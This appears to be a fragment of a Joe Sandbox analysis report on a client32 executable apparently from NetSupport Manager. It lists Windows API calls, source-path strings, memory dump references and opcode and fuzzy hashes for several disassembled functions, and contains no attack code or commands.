                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                • m_hWnd, xrefs: 11001126
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1604732272-2830328467
                                                                                                                                                                • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                                                                                • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                                                                                                • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                                                                                • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                                                                • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                                                                                • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                                                                                                • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                                                                                • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 1103D5BF
                                                                                                                                                                • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103D5D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindMessageSendWindow
                                                                                                                                                                • String ID: NSMClassList
                                                                                                                                                                • API String ID: 1741975844-2474587545
                                                                                                                                                                • Opcode ID: 718772859f33f448c89d93b5f37c290420823d037368ac38c074b4f83ca60ad9
                                                                                                                                                                • Instruction ID: 7f82e6ac788c827237b9f9d92b71e0ea3c568c774f1ab0da8c2af698dd4ba3dc
                                                                                                                                                                • Opcode Fuzzy Hash: 718772859f33f448c89d93b5f37c290420823d037368ac38c074b4f83ca60ad9
                                                                                                                                                                • Instruction Fuzzy Hash: 37D01236650228BBD7049BA68C49FA7BB9DEB85755F018055F6689A180CA71D50187E0
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(1100D71E,?,00000000,?,1100CA4A,?), ref: 1100D4A9
                                                                                                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA4A,?), ref: 1100D4B8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoadVersion
                                                                                                                                                                • String ID: AudioCapture.dll
                                                                                                                                                                • API String ID: 3209957514-2642820777
                                                                                                                                                                • Opcode ID: 31b78285a9ca15673ba87c57432177bf1cff156aadcdf76d1ced8aa22ba9c77d
                                                                                                                                                                • Instruction ID: ab88030cee3ff84c3afa862bf4e3a54fa00084ca03ad85f46d803c7cbd51aa0e
                                                                                                                                                                • Opcode Fuzzy Hash: 31b78285a9ca15673ba87c57432177bf1cff156aadcdf76d1ced8aa22ba9c77d
                                                                                                                                                                • Instruction Fuzzy Hash: DBE01734E2116B8BF7468BB58C4839DBBD1A740A9AFC250B0E826C1548FB689440DB20
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy
                                                                                                                                                                • String ID: 1000,50$1000,50
                                                                                                                                                                • API String ID: 2961919466-2776873633
                                                                                                                                                                • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                                                                                • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                                                                                                • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                                                                                • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                                                                                                APIs
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                                                                                • API String ID: 2400454052-4183089485
                                                                                                                                                                • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                                                                                • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                                                                                                • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                                                                                • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowTextLengthA.USER32(00000000), ref: 11153524
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1115350E
                                                                                                                                                                • m_hWnd, xrefs: 11153513
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 67735064-2830328467
                                                                                                                                                                • Opcode ID: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                                                                                                • Instruction ID: 41066489dfbac7b1bedb0840a1a625780406ac6dbed52086b597086e3eac16ab
                                                                                                                                                                • Opcode Fuzzy Hash: fad9644258b9fcb2970ce22f50fed9297b46cc15e0ab03ded2db0d651ee77a36
                                                                                                                                                                • Instruction Fuzzy Hash: 5FD022B5B69229ABC31096A1EC84FC1B3849B0832CF011834F03553400E660B8C08341
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111ECE2C,00000000,?,?,1100C13B,00000000,00000000), ref: 1100D77F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C,?,?,1100C13B,00000000,00000000), ref: 1100D7F0
                                                                                                                                                                  • Part of subcall function 1100D6E0: EnterCriticalSection.KERNEL32(111ECE2C,1100CA4A,?,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D6E9
                                                                                                                                                                  • Part of subcall function 1100D6E0: LeaveCriticalSection.KERNEL32(111ECE2C,1100B4AC,?,00000000,?,1100CA4A,?), ref: 1100D761
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D7BF
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D7DB
                                                                                                                                                                  • Part of subcall function 1100D690: EnterCriticalSection.KERNEL32(111ECE2C,1100C3CB), ref: 1100D695
                                                                                                                                                                  • Part of subcall function 1100D690: LeaveCriticalSection.KERNEL32(111ECE2C), ref: 1100D6CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                • Opcode ID: 814b6c6d370acaf2a60d7adc16ec1fb1b49ba5a5cd7674d308ab0b87800441f2
                                                                                                                                                                • Instruction ID: 08a2a681f85b9e6f908ed91d35112c8f73428e95198a676c648ef119a840dcee
                                                                                                                                                                • Opcode Fuzzy Hash: 814b6c6d370acaf2a60d7adc16ec1fb1b49ba5a5cd7674d308ab0b87800441f2
                                                                                                                                                                • Instruction Fuzzy Hash: E601713AE122385BE705DBF4DC49B9DFBA8EB0CA95B0001A5FC1CD3200E670AD0087E1